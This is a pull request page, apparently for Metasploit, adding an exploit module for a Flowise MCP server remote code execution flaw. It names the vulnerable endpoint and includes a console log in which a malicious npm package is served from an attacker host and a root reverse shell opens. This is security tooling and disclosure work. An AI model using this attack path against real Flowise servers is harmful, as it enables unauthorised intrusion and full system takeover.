Skip to content

exploit/multi/http/flowise_mcp_rce: Add Flowise MCP Server RCE (CVE-2026-56274)#21616

Open
jafarov007 wants to merge 2 commits into
rapid7:masterfrom
jafarov007:exploit/flowise_mcp_rce
Open

exploit/multi/http/flowise_mcp_rce: Add Flowise MCP Server RCE (CVE-2026-56274)#21616
jafarov007 wants to merge 2 commits into
rapid7:masterfrom
jafarov007:exploit/flowise_mcp_rce

Conversation

@jafarov007

@jafarov007 jafarov007 commented Jun 28, 2026

Copy link
Copy Markdown

Description

Adds a new exploit module for CVE-2026-56274, a remote code execution
vulnerability in Flowise versions prior to 3.1.2.

The vulnerability exists in the /api/v1/node-load-method/customMCP endpoint,
which allows an authenticated attacker to execute arbitrary commands via a
malicious npm package served over HTTP and executed by npx.

Related Issue: N/A

Breaking Changes

None

Verification Steps

    • Start a vulnerable Flowise instance (version < 3.1.2)
    • Load the module: use exploit/multi/http/flowise_mcp_rce
    • Set RHOSTS, USERNAME, PASSWORD, LHOST
    • Run check to verify the target is vulnerable
    • Run exploit to obtain a command shell session — expected output: whoami returns root

Test Evidence

msf exploit(multi/http/flowise_mcp_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(multi/http/flowise_mcp_rce) > run
[] Exploit running as background job 0.
[
] Exploit completed, but no session was created.
msf exploit(multi/http/flowise_mcp_rce) >
[] Started reverse TCP handler on 192.168.x.x:4444
[
] Building malicious npm package tar in memory...
[+] Tar package built in memory (3584 bytes)
[] Using URL: http://192.168.x.x:8000/msf.tar
[
] Server started.
[] Authenticating as asdf@asf.asdf...
[+] Authentication successful
[
] Sending malicious MCP node config (tar URL: http://192.168.x.x:8000/msf.tar)...
[+] 192.168.x.x flowise_mcp_rce - Serving malicious tar package to 192.168.x.x (GET /msf.tar)
[] Command shell session 1 opened (192.168.x.x:4444 -> 192.168.x.x:49926) at 2026-06-29 00:17:12 +0300
[!] Exploit request returned HTTP no response
sessions -i 1
[
] Starting interaction with 1...

Shell Banner:
/bin/sh: can't access tty; job control turned off
/ #

/ # ls
a.out
bin
dev
etc
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
??H?B?????
/ # whoami
root

Environment

Field Details
Operating System Kali Linux
Target Software/Hardware Flowise 3.1.1

AI Usage Disclosure

None

Pre-Submission Checklist

  • Included a corresponding documentation markdown file in documentation/modules
  • No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
  • Tested on the target environment specified in the Environment section above
  • Read the CONTRIBUTING.md and module acceptance guidelines
  • Included RSpec tests for library changes

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

Status: Todo

Development

Successfully merging this pull request may close these issues.

2 participants